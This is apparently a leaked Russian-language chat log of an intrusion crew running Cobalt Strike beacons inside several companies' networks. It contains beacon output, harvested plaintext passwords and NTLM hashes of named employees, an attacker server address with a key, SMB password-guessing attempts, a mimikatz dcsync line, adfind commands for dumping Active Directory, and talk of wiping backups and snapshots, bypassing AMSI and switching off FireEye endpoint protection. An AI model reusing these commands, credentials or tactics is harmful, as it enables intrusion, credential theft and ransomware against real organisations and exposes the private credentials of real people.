```а хост доступен вообще?как будто под другим контекстом маунтилисьони почему-то unavailable висят[ ](https://mediaeveryone.com/group/korbel-com?msg=jdyKZby3gt8qryYk9) я про серваки если вдругтак мб не дошло до туда еще?оба без запискиZ / Yна него примаплено 2 дискапосмотрите на хосте SQLчет мимо как-будтовот только замапленные дискихмбэкапы насы?сам проверил везде ls C:\дапроверили ридми?притянули сервера, замапили армы, сделали dllinjectда
все ок??т е вы раскидали, замапили и запустили?все еще пранкуете по анричбл)а ну окей да
они анричбл простода4.2 ?не подтянулись
```
10.10.1.61 -
10.10.1.6 -
10.10.1.60 -
```[ ](https://mediaeveryone.com/group/korbel-com?msg=PyBQTPoGEaL2NFYJj) кобана этом 10.10.1.60 портскан даже не выдаёт, что он живойпосмотрю кое чекиньте доступ в кобальт и дайте айпишники этих 3 серваков которые не притягиваюся и не имеют портов пожалуйстаа 445 135 139 какие то открыты там?да, это kb-temperature.korbel.com
```
>operatingSystem: Windows Server 2016 Standard
```Армы
```
10.10.32.177 - Lost = 4 (100% loss)
10.10.17.28 - Lost = 4 (100% loss)
10.10.32.161 - Lost = 4 (100% loss)
10.10.1.50 - Destination host unreachable
10.10.1.129 - Destination host unreachable
10.20.1.30 - Destination host unreachable
```

Сервер
```
10.10.1.60 - Destination host unreachable
``````
у 3 нет дисков, шар,3389
```
это точно виндовые сервера?```
Сервера
	Всего серверов по ад - 69
	Живых - 50
	Закрыто - 47 ( у 3 нет дисков, шар,3389)

Сфера - снапшоты потерты

Армы
	Всего по ад - 322
	Живых - 140
	Закрыто - 118
``все, закончили``
`Teemo[KORBELDC1]SYSTEM */464|2020Dec23 04:28:53> net share \\10.10.13.14
[Tasked beacon to run net share on 10.10.13.14
[+] host called home, sent: 105058 bytes
[+] received output:
Shares at \\10.10.13.14:

 Share name Comment
 ---------- -------
 ADMIN$ Remote Admin
 C$ Default share
 D$ Default share
 IPC$ Remote IPC
 print$ Printer Drivers`
``соотв по роадмапу есть действия на это``
10.10.1.6 -
10.10.13.14 -
10.10.1.61 -
```
серваки не притянулись и не мапятся

```
10.10.1.65 -
10.10.32.157 -
10.10.16.58 -
10.10.1.20 -
10.20.1.24 -
10.10.17.63 -
```
а это армы не мапятся@user4
```
10.10.32.153
10.10.4.100
10.10.12.156
10.10.16.238
10.10.12.52
10.10.32.172
10.10.17.54
10.10.16.51
10.10.16.19
10.10.16.39
10.10.16.15
10.10.16.190
10.10.16.165
10.10.32.178
10.10.17.48
10.10.12.156
10.10.1.94
10.10.16.41
10.10.17.47
10.10.16.37
10.10.16.172
10.10.1.135
10.10.16.2
10.10.16.34
10.10.16.43
10.10.17.41
10.10.16.197
10.10.17.38
``@user3
```
10.10.32.149
10.10.17.61
10.10.17.69
10.10.17.39
10.10.16.38
10.10.16.195
10.10.32.145
10.20.2.82
10.10.16.245
10.10.16.48
10.10.16.194
10.10.12.51
10.10.16.64
10.10.32.150
10.10.17.59
10.10.17.38
10.10.16.180
10.10.16.250
10.10.16.21
10.10.17.55
10.10.16.26
10.10.16.55
10.10.1.46
10.10.16.13
10.10.16.3
10.10.16.63
10.10.16.245
10.10.17.49
``@user7
```
10.10.16.29
10.10.16.42
10.10.1.65
10.10.16.7
10.10.17.39
10.10.17.4
10.10.16.230
10.10.12.50
10.9.32.98
10.10.16.166
10.10.32.130
10.10.16.179
10.10.4.38
10.10.32.157
10.10.17.12
10.10.17.22
10.10.16.58
10.10.1.20
10.10.16.181
10.20.1.24
10.10.1.134
10.10.16.49
10.10.17.63
10.10.17.26
10.10.32.130
10.10.12.156
10.10.16.23
10.10.17.44
``@user8
```
10.10.16.88
10.10.32.150
10.10.12.53
10.10.1.81
10.10.16.163
10.10.3.26
10.10.32.154
10.10.16.167
10.10.16.16
10.10.16.170
10.10.16.10
10.10.17.66
10.10.16.17
10.10.16.60
10.10.16.162
10.9.0.2
10.10.17.23
10.10.4.37
10.10.32.177
10.10.17.28
10.10.16.32
10.10.1.50
10.10.32.161
10.10.16.36
10.10.1.129
10.10.16.54
10.20.1.30
10.10.17.18
```армыспасибо))было бы отличнотаску удалить?ок@user9 пожалуйста еще удалите тут дл которую кидали `COGNOSPD`user4
```
10.10.1.105
10.9.1.2
10.9.1.5
10.10.1.98
10.10.1.171
10.10.1.101
10.10.1.100
10.10.1.35
10.10.4.9
10.10.1.188
``````
	 * Username : daniel.harvey_adm
	 * Domain : KORBEL
	 * Password : W3lcome?

	 * Username : adaudit
	 * Domain : korbel
	 * Password : #aud1T#

	 * Username : ben.mandeville
	 * Domain : KORBEL
	 * Password : 1234qwerASDF!@#$
```снапшотов*но это на потомроадмап кстати бы дополнить инфой про дроп бэкапов``
45.126.210.66:22514
cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe
```хорошо)[ ](https://mediaeveryone.com/group/korbel-com?msg=LrnbrbomduXzS6viq) пока нет)раз меньше 100 получается тянем в однуне от тебякобуот меня что то требуется?дану что начинаем?а именно?@tl1 не могу на дэдик попасть
`209.222.97.50:10101````
192.168.0.46:5000
192.168.0.46:80
192.168.0.41:515
192.168.0.41:443
192.168.0.41:80
192.168.0.41:139
192.168.0.38:5000
192.168.0.23:443
192.168.0.23:80
192.168.0.17:5900
192.168.0.17:5800
192.168.0.17:5040
192.168.0.17:3389
192.168.0.17:139
192.168.0.17:135
192.168.0.10:139
192.168.0.10:80
192.168.0.1:139
192.168.0.1:80
192.168.0.10:445 (platform: 500 version: 6.1 name: READYSHARE domain: WORKGROUP)
192.168.0.17:445 (platform: 500 version: 10.0 name: ATSALES_RL_LAP domain: AT)
192.168.0.41:445
``````
Teemo[ATSALES_RL_LAP]rlawrence/3100|2021Jan29 20:53:18> shell systeminfo
[*] Tasked beacon to run: systeminfo
[+] host called home, sent: 41 bytes
[+] received output:

Host Name: ATSALES_RL_LAP
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19041 N/A Build 19041
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00330-50315-96784-AAOEM
Original Install Date: 11/10/2020, 7:18:46 PM
System Boot Time: 1/27/2021, 1:42:15 PM
System Manufacturer: LENOVO
System Model: 80SX
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 78 Stepping 3 GenuineIntel ~1800 Mhz
BIOS Version: LENOVO 0ZCN41WW, 9/15/2017
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-07:00) Mountain Time (US & Canada)
Total Physical Memory: 5,864 MB
Available Physical Memory: 1,787 MB
Virtual Memory: Max Size: 9,576 MB
Virtual Memory: Available: 3,440 MB
Virtual Memory: In Use: 6,136 MB
Page File Location(s): C:\pagefile.sys
Domain: AT.LOCAL
Logon Server: \\ATSALES_RL_LAP
Hotfix(es): 7 Hotfix(es) Installed.
                           [01]: KB4586876
                           [02]: KB4577266
                           [03]: KB4580325
                           [04]: KB4586864
                           [05]: KB4593175
                           [06]: KB4598481
                           [07]: KB4598242
Network Card(s): 3 NIC(s) Installed.
                           [01]: Qualcomm Atheros QCA9377 Wireless Network Adapter
                                 Connection Name: Wi-Fi
                                 DHCP Enabled: Yes
                                 DHCP Server: 192.168.0.1
                                 IP address(es)
                                 [01]: 192.168.0.17
                           [02]: Realtek PCIe GBE Family Controller
                                 Connection Name: Ethernet
                                 Status: Media disconnected
                           [03]: Bluetooth Device (Personal Area Network)
                                 Connection Name: Bluetooth Network Connection
                                 Status: Media disconnected
Hyper-V Requirements: VM Monitor Mode Extensions: Yes
                           Virtualization Enabled In Firmware: No
                           Second Level Address Translation: Yes
                           Data Execution Prevention Available: Yes

```
скорее всего ноутбук``
Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:44:02> shell dir C:\Users
[Tasked beacon to run: dir C:\Users
[+] host called home, sent: 43 bytes
[+] received output:
 Volume in drive C is Windows
 Volume Serial Number is 2C89-5747

 Directory of C:\Users

11/10/2020 06:41 PM <DIR> .
11/10/2020 06:41 PM <DIR> .
11/10/2020 07:03 PM <DIR> administrator
11/10/2020 06:55 PM <DIR> administrator.AT
11/10/2020 06:56 PM <DIR> administrator.AT.000
11/10/2020 06:57 PM <DIR> administrator.ATSALES_RL_LAP
11/10/2020 06:54 PM <DIR> Barfield
11/10/2020 06:58 PM <DIR> LogMeInRemoteUser
11/10/2020 07:32 PM <DIR> Public
11/10/2020 06:56 PM <DIR> RLAWRENCE
11/10/2020 06:58 PM <DIR> rlawrence.AT
01/27/2021 01:44 PM <DIR> rlawrence.ATSALES_RL_LAP
               0 File(s) 0 bytes
              12 Dir(s) 847,083,728,896 bytes free

```
ну доменные пользаки ходят на эту тачкуДА нетувг что ли``
Teemo[ATSALES_RL_LAP]SYSTEM */12676|2021Jan29 20:41:44> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Barfield
rlawrence
The command completed successfully.

```сесия опять оффнашёл лишь ярлык ведущий к файлуискал впнадинфо не снял так как домен не доступен былbarfieldinc.com``
MS.Outlook.15:rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1
portal.us.elephantoutlook.com\rlawrence@amgusa.org P@ssword1
at\rlawrence c35845dac149d05a4fce77de6e0b5ec0
10.0.6.59\at\administrator admin@Barfield
lh_data-server\at\rlawrence P@ssword1
MS.Outlook.15:rlawrence@amgusa.org:PUT\rlawrence@amgusa.org @@CoAAAAAyBAbAEGA3BgcAUGAuBwYAUGAABQYA0GAnBQdAMHAhBgLA8GAyBwZAA
MicrosoftOffice16_Data:SSPI:rlawrence@barfieldinc.com\rlawrence@amgusa.org P@ssword1
ATSALES_RL_LAP\rlawrence c35845dac149d05a4fce77de6e0b5ec0
rlawrence@amgusa.org\rlawrence@amgusa.org P@ssword1
```пока все ссылки проверил сетка отвалилась (ошибочка вышла, `barfieldinc.com` их доменеще разокeyJhbGciOiJBKPo27yB6IVIvIi9wFeTMhPdcUc+V3inOPApoLXYnqa8LymUXCu3TSayjTQAKEHuRdM8P30shXj7gOkrV6hEbhJsvPPeJAR2UMMLK0s8FgbrHIXH/sav//HMOGzk01KZeb9Lm+lURefztW3pyHfnnipoKjYztgR2nQYs7tBiukVz3nu808H3eLJS/edbod3MK47DQ9YtJXvkftAPT9Ng/gdBrvhr/1Cax1JrrjOz2aCeEprkrMiSaJvpAC6YdJ2itxPLj5XmBnVeTEcD/6BNt84K7T77J+IjC+xgE1+a/KuDU3pXyQl9eDvTdLkcoHKZZatUTjsMq2qyUCs+FYQccBia/KZwLNn5gsYSGT1JNWPaFdD2K8oXaGSXstL8lWjZOAy54Ut0h637q9vKJTgJs1jM/KSIYzxDiuNZjgFFTauD6KqwZb2k1XJAdaKFetS2bwARuOeMM49GU0Ft9DUI/0JFZWeTJdpKTHZk6JAFQT7auCYduDiTk+kgl5gtOGpop2Y7oe0MCRa3rj0DQUu3I2Sr3J74TYBRVQP4nP0MrINVV/qbOPowpq/xrN8pOS3Ake9niHHKIM2+r713wwtA/7DHpk6lEtd6JqQH6O7ot04ioxY8xm+DwB1349Cq7NM0AFgvjxOE7jBKHj4NWUwr83LgmYSCK1zyD33xIrXO8gilNwWW755yGAWdVm5325kJ2zY43xmyEmBPHlOvtor78gSX0YyxMkbDh6dIpCypkDT3DH+2cSGPiWtwbIm5cWAFSQ57Jj+fal81kMjlPvGxqUAHnzCKNii8t5IqbZCVr51HgMivb6CfqSWbLmsbBJIx91m5aNC2I0V6nJTjRkELGiD6bG+ex1t91kk33bbRqacA6gmj2D1LZc9590bvmyPereU/K9p2YFhQGxsmEM81Jp6NpvRjhI1dZyjtnfWYHeBlgy+xcF8uxINua9DOwGHhEm5j0ZKM92b7Hg2a8H7Eo/Ksu1J83N+RxOw9oUhUt7h ставлю скан``
beacon> shell net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator
[Tasked beacon to run: net use \\10.100.7.16\c$ 1969C00p3r /user:Administrator
[+] host called home, sent: 86 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.


beacon> shell net use \\10.100.7.16\c$ consolidate_16 /user:Administrator
[Tasked beacon to run: net use \\10.100.7.16\c$ consolidate_16 /user:Administrator
[+] host called home, sent: 90 bytes
[+] received output:
System error 86 has occurred.

The specified network password is not correct.
```не локнуть бы)ну попробуй ЛА дааможно попробовать эти учетки на смб логин``
Administrator:1969C00p3r
Administrator:consolidate_16
```либо есть другие энтерылибо пасс у Администратора разныйи пересечений нетя снял со всех текущих доменов энтеровсе? получилось?энтерпрайсы и вми сервис локальные админы на ДК``

PDC
Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================
``````
    DEN-DCON-02.na.panavision.com [DS] Site: Denver
    DEN-DCON-01.na.panavision.com [PDC] [DS] Site: Denver
    WDH-DCON-02.na.panavision.com [DS] Site: Woodland-Hills
The command completed successfully

=============================================

PDC
Alias name administrators
Comment Members can fully administer the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DEN-DCON-01$
Domain Admins
PVRT\Enterprise Admins
PVRT\wmi.service
=============================================

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
#yromero adfs.admin Administrator
BackupMgr CZambrana_da exponential
it.deploy it.inventory jharris_da
mpatterson_ea orivera_da PKooiman_da
sanadmin SP_Admin SQLAgent
windchilladmin yromero_ea
pvna\#yromero V@ndals1974


=============================================

``эмм``
beacon> shell ping -n 1 panavision.com
[*] Tasked beacon to run: ping -n 1 panavision.com
[+] host called home, sent: 55 bytes
[+] received output:

Pinging panavision.com [10.100.7.16] with 32 bytes of data:
Reply from 10.100.7.16: bytes=32 time<1ms TTL=126

Ping statistics for 10.100.7.16:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``это нужный домен?технологии...он даже аптайм показывает``
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 10.100.7.16:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:required) (uptime:3d 11h 49m 56s) (guid:{1466eec3-53c0-4eb4-af7e-1dabe2584051}) (authentication domain:PVRT)
[+] 10.100.7.16:445 - Host is running Windows 2016 Standard (build:14393) (name:GBL-DCON-02) (domain:PVRT)
[*] 10.100.7.16: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```я со времен армы вообще не трогала ты давно сканил через смб вершн?откуда эта теория?)))а я думал что видимость днс это аналог трастану так в чем проблема?его походу все видятSYD-WSUS-01``
   DNS Suffix Search List. . . . . . : ap.panavision.com
                                       na.panavision.com
                                       panavision.com
                                       eu.panavision.com
                                       sa.panavision.com

```скан щас поставлюа тут общих ДА на сколько помнюпоробовать туда креды ДА с "тем" доменомнайти там тачкинадо отсканить на смб_вершн диапазони всепросто эти машины "видят" доменты страный какой-то
схуяли видимоть ДНСа траст должна давать?чувак)бляне понимаю``
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/15-00:51:44 GMT Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
``или стопбля а реально он тут довереный``
dn:CN=panavision.com,CN=System,DC=ap,DC=panavision,DC=com
>whenCreated: 2006/01/16-23:54:35 GMT Daylight Time
>name: panavision.com
>securityIdentifier: S-1-5-21-4133310860-2374335328-2948649967
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: panavision.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 32 [Within-Forest(32)]

```вернораз у них днс довереныйага ну т е он общается с карантиным доменом``
   DNS Suffix Search List. . . . . . : ap.panavision.com
                                       na.panavision.com
                                       panavision.com
                                       eu.panavision.com
                                       sa.panavision.com
``вон сабнет карантиненного доменаэто с EUR-DCON-01``
Pinging panavision.com [10.100.7.16] with 32 bytes of data:

```видишь?``
beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:

Windows IP Configuration

   Host Name . . . . . . . . . . . . : AUS-DCON-01
   Primary Dns Suffix . . . . . . . : ap.panavision.com
   Node Type. . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : ap.panavision.com
                                       na.panavision.com
                                       panavision.com
                                       eu.panavision.com
                                       sa.panavision.com

``надо``
Host Name: EUR-WSUS-16
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00377-60000-00000-AA934
Original Install Date: 10/4/2018, 4:40:38 PM
System Boot Time: 9/12/2020, 7:25:46 PM
System Manufacturer: Microsoft Corporation
System Model: Virtual Machine
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2400 Mhz
BIOS Version: Microsoft Corporation Hyper-V UEFI Release v1.0, 11/26/2012
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-gb;English (United Kingdom)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 8,095 MB
Available Physical Memory: 4,448 MB
Virtual Memory: Max Size: 9,375 MB
Virtual Memory: Available: 5,468 MB
Virtual Memory: In Use: 3,907 MB
Page File Location(s): C:\pagefile.sys
Domain: eu.panavision.com
Logon Server:              N/A
Hotfix(es): 18 Hotfix(es) Installed.
                           [01]: KB3192137
                           [02]: KB4091664
                           [03]: KB4132216
                           [04]: KB44659
                           [05]: KB4485447
                           [06]: KB4498947
                           [07]: KB4503537
                           [08]: KB4509091
                           [09]: KB4512574
                           [10]: KB4520724
                           [11]: KB4521858
                           [12]: KB4524244
                           [13]: KB4540723
                           [14]: KB4550994
                           [15]: KB4562561
                           [16]: KB4565912
                           [17]: KB4576750
                           [18]: KB4577015
Network Card(s): 1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: Yes
                                 DHCP Server: 10.32.1.41
                                 IP address(es)
                                 [01]: 192.168.33.101
                                 [02]: fe80::f831:9a12:366d:1ed6
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

```а во
айпиконфигдай весь вывод системнифо``
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: Yes
                                 DHCP Server: 10.32.1.41
                                 IP address(es)
                                 [01]: 192.168.33.101
                                 [02]: fe80::f831:9a12:366d:1ed6

``````
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled: No
                                 IP address(es)
                                 [01]: 192.168.1.85
                                 [02]: fe80::188e:a234:ce85:3eb7

``если хочешь могу дать тебе доступ сам потыкаешьно прикол в том, что его собственная нагрузка определятся как малварь)))вобще суть его в том, что он обходит амси и позволяет через себя модули типо мимика запускатьи как он кстати?ну просто в системинфо глянья развернул тот поверхабкстатиа как еще снимать днсы я хз)а я поэтому и скинул тебе что папки dns нет и как и утилиты)там где НЕТ днс сервера?)))что не снимешь днс записину логически то ты же понимаешьтак ты и сказал мол сними днс я только об этом и знаю)итдпосмотри кто логинился на сервак (если там с других доменов кто был - будет видно)и посмотри какие там ндсы будут блин)сделайsysteminfoчто ты дампить пытаешься?)это ж не днс сервера че за хуйню ты делаешь?что теперь делаем?папки DNS нигде нет, dnscmd тоже не нашло в system32``
beacon> shell dnscmd /enumzones > AllZones.txt
[*] Tasked beacon to run: dnscmd /enumzones > AllZones.txt
[+] host called home, sent: 63 bytes
[+] received output:
'dnscmd' is not recognized as an internal or external command,
operable program or batch file.

``````
beacon> shell dir C:\windows\system32\dns
[*] Tasked beacon to run: dir C:\windows\system32\dns
[+] host called home, sent: 58 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is 5C94-6AB3

 Directory of C:\windows\system32

File Not Found

``ну если он через сервисы вырубается то можно массово будет батником хуйнуть какие проблемыно надо на каждом пк откл как ты понимаешьа он через сервисы еще отключаетсяадминку надо от фаерая найти будет...```
Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251

Ping statistics for 192.168.33.101:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 157ms, Maximum = 157ms, Average = 157ms



Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251

Ping statistics for 192.168.1.85:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 204ms, Maximum = 204ms, Average = 204ms

``даже так, еще один всус жив``

Pinging AUB-WSUS-16.eu.panavision.com [172.16.1.120] with 32 bytes of data:
Reply from 66.45.62.99: Destination net unreachable.

Ping statistics for 172.16.1.120:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

[+] received output:

Pinging EUR-WSUS-16.eu.panavision.com [192.168.33.101] with 32 bytes of data:
Reply from 192.168.33.101: bytes=32 time=157ms TTL=251

Ping statistics for 192.168.33.101:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 157ms, Maximum = 157ms, Average = 157ms

``````
The genuine xagt.exe file is a software component of FireEye Endpoint Security by FireEye.
FireEye Endpoint Security is a single-agent security solution that protects endpoint systems from online threats. Xagt.exe runs a core process associated with FireEye Endpoint Security. Disabling this process may cause issues with this program
``если бы мой англ был хуже чем 0, я бы перевел как горящая жопа[ ](https://mediaeveryone.com/group/panavision-com?msg=ChvqBYADCYspYbbPi) так огенный глазтакая штука есть``
> Sage

AUB-SAGE-16
``кстати
а что с авером в сети?давай-ка посмотрим что на нем)ага рабочий``
Pinging SYD-WSUS-01.ap.panavision.com [192.168.1.85] with 32 bytes of data:
Reply from 192.168.1.85: bytes=32 time=204ms TTL=251

Ping statistics for 192.168.1.85:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 204ms, Maximum = 204ms, Average = 204ms

```во
интересноSCCM больше нет кроме того, которого не существуетвот этот WSUS``
beacon> shell ping -n 1 SYD-WSUS-01
[*] Tasked beacon to run: ping -n 1 SYD-WSUS-01
```есть надежда)1 на 4 домена получаетсяхреновато...поэтому может он под другим именем``
beacon> shell ping -n 1 DEN-SCCM-01
[*] Tasked beacon to run: ping -n 1 DEN-SCCM-01
beacon> shell ping -n 1 DEN-WSUS-01
[Tasked beacon to run: ping -n 1 DEN-WSUS-01
[+] host called home, sent: 104 bytes
[+] received output:
Ping request could not find host DEN-SCCM-01. Please check the name and try again.

[+] received output:
Ping request could not find host DEN-WSUS-01. Please check the name and try again.

``````
dn:CN=DEN-WSUS-01,OU=Disabled Computers,DC=na,DC=panavision,DC=com
dn:CN=DEN-SCCM-01,OU=Disabled Servers,DC=na,DC=panavision,DC=com
``тут такое делобычно подписан просто как WSUSкто? WSUS сервак?он как-то может выделяться из ад компс по СПН?лол) окейвернотипо 1 сервер можеть одним WSUS на несколько доменов?включая карантинSCCM / WSUS сервера часто под разными хостнеймами присутствуют во всех доменах лесану датипо WSUS будет доверенным сервером т к видит ДНС сервер карантина?не совсем понимаю как?поснимай, они могуть видеть карантинснимать со всех текущих доменов?неаснимал ДНСы с SCCM/WSUS ?есть мысли как?бля
надо искать вход...без проблем``
dn:CN=PANAVISION,CN=System,DC=panavision,DC=com
>whenCreated: 2005/09/14-16:51:44 Pacific Daylight Time
>name: PANAVISION
>securityIdentifier: S-1-5-21-202912000-196093339-1136263860
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: PANAVISION
>trustType: 1 [Downlevel(1)]
>trustAttributes: 4 [Quarantined-Domain(4)]
```напомни как он называется пожалуйстав карантиный домен лезть не надо?бекапы найдены?так что теперь по плану?```
eu.panavision.com
=================



> Domain Controller

AUB-DCON-01
PRK-DCON-01
PRK-DCON-02
GFD-DCON-01
GFD-DCON-02
EUR-DCON-01
GFD-DCON-16

--------------------

> File Servers

PRA-FILE-01
PRK-FILE-01
AUB-FILE-01
AUB-FILE-02
GFD-FILE-01
AUB-FILE-04
FR-SPARESERVER
MAN-FILE-02
PRV-FILE-02
WTL-FILE-02

--------------------

> Sage

AUB-SAGE-16

--------------------

> SQL

PA-SDS-01
EUR-DOMS-01
EUR-ACMS-01
EUR-MSQL-14
AUB-WEB-01
GFD-ACMS-02
PA-INTB-01
PRK-ITMS-01

--------------------

> UAG Server

EUR-FUAG-01

--------------------

> Insphire Server

EUR-INSP-01

--------------------

> Hyper-V

AUB-HYPV-01
AUB-HYPV-01
AUB-HYPV-02
GFD-HYPV-05
GFD-HYPV-06
AUB-HYPV-04
PRK-HYPV-03

--------------------

> Remote Desktop Services Server/Credit Host

EUR-RDS-04
EUR-RDSH-08
EUR-MRDS-01
EUR-RDSB-01
EUR-RDSH-01
EUR-RDSH-02
EUR-RDSH-03
EUR-RDSH-04
EUR-RDSH-05
EUR-RDSB-02
EUR-RDSB-03
EUR-RDSH-06
EUR-RDSH-07

--------------------

> Interbase Database Server

GBL-INTR-01
GBL-INTR-02

--------------------

> WSUS

AUB-WSUS-16
EUR-WSUS-16

--------------------

> Terminal Server License Servers

EUR-LHPV-01
EUR-LHPV-02
EUR-LHPV-03

--------------------

> ATS Server

PA-PRTSVR

--------------------

> Disabled Computers

PRK-SRCE-01
PRK-BUILD-01
PRK-CBLD-01
PRK-CSYS-01
PRK-CVCS-01
PRK-HPV-01
EUR-LRAH-01
EUR-LRAH-02
EUR-DCON-02

--------------------

> Failover cluster virtual network name account

PRK-CLST-12
GDF-CLST-01

--------------------

> Lexicon
(Web Hosting, eCommerce Solutions, Peace of Mind. LexiConn provides personal service, expert, in-house support, and rock solid hosting solutions designed to grow and evolve with the needs of your business)

EUR-LRAH-03
EUR-LRCB-01
EUR-LRAH-04
EUR-LRAH-05

--------------------

> Unavailable

EUR-LEE-01
EUR-LEE-02
EUR-LEE-03
EUR-LEE-04
EUR-MDPM-01
GFD-CORESRV-01

--------------------

> w3wp

EUR-LREP-01
EUR-LSRV-02
EUR-LSRV-06
EUR-LSRV-07
EUR-LSRV-08
EUR-LSRV-09

--------------------

> PDQ

EUR-ITMS-12


--------------------

???

AT-SRV-APPS-1
EUR-CSYS-01
EUR-CVCS-01
GFD-ALCT-01
``спроси у коллег, там по моему рце находили?и это только чекеря нашел, но он чекает только по 1 ip за разнуу, я не проверял)смбгост мимо?вобщем по этой сетке
моя последня надежда на зерологон(который не пачнули после последнй попытки лол)
чтобы снять dcsync надо делать токен через pth, но т.к. нет системы - не выйдет
```
mimikatz lsadump::dcsync /dc:SS-Data2.Austin.SilencerShop.com /user:SilencerShop\krbtgt /authuser:SS-DATA2$ /authdomain:. /authpassword:"" /authntlm
```
вот эта строка не работает походу потому что в CS старый мимик
а новую версию на машину не уровнить т.к. видит как вирус.у нас есть только один валидный пользователь который ходит по смб на 10.7.20.30 - и хз что за машина(он там локальный пользак)если вы сняли ad_users.txt я уж понял что у вас есть логины))только логинынашли ДА без паролейДА нашли = логин и пароль валидныЛогин ДАмы в домен залезть не можемДА нашли (нашли их логины)ну т е тут все ок, пока ищите ДАПодключились к впнтак вы не подключились к впн?за vpnпо локальной)или по какой сети вы гуляете?проверили локальных админов, учетки ДА на найденные пароли> Подняли vpn, через наш дедик гуляем по сети
я не так читаю эту фразу?Нашли к домену не подключенныДА нашли?в домен пролезли?проверили по smb админаПодняли vpn, через наш дедик гуляем по сети, смотрим что есть, сканируем на ms17как успехи?``
[+] 10.7.20.30:445 - 10.7.20.30:445 - Success: 'WORKSTATION\Louisad:M@tches2020!!'

``description
```
 Prod App read only (Matches2014) - prodappread
 Test account for app pw matches123 - ipadvpn
 iTunes Account for Richmond stores (Matches123) - richapp
```DA``
LDAP_SEARCH_S: 0x34
LDAP_SEARCH_S: Unavailable

ERROR: Couldn't gather RootDSE Info...
Terminating program.

``````
adfind.exe -f "(objectcategory=person)" -h 10.1.4.30 > ad_users.txt
adfind.exe -f "objectcategory=computer" -h 10.1.4.30 > ad_computers.txt
adfind.exe -f "(objectcategory=organizationalUnit)" -h 10.1.4.30 > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) -h 10.1.4.30 > subnets.txt
adfind.exe -f "(objectcategory=group)" -h 10.1.4.30 > ad_group.txt
adfind.exe -gcb -sc trustdmp -h 10.1.4.30 > trustdmp.txt
```его не существует в домене и вы пытаетесь сделать запросы к ДК с запрещенного пксуть в том, что вы не можете снять АД, т к ваш пк в воркгуппедавы там подняли впн?а, вы дедик притянулиэто дедикваши файлы?```
 Directory of C:\users\Administrator\Desktop

09/28/2020 03:23 PM <DIR> .
09/28/2020 03:23 PM <DIR> .
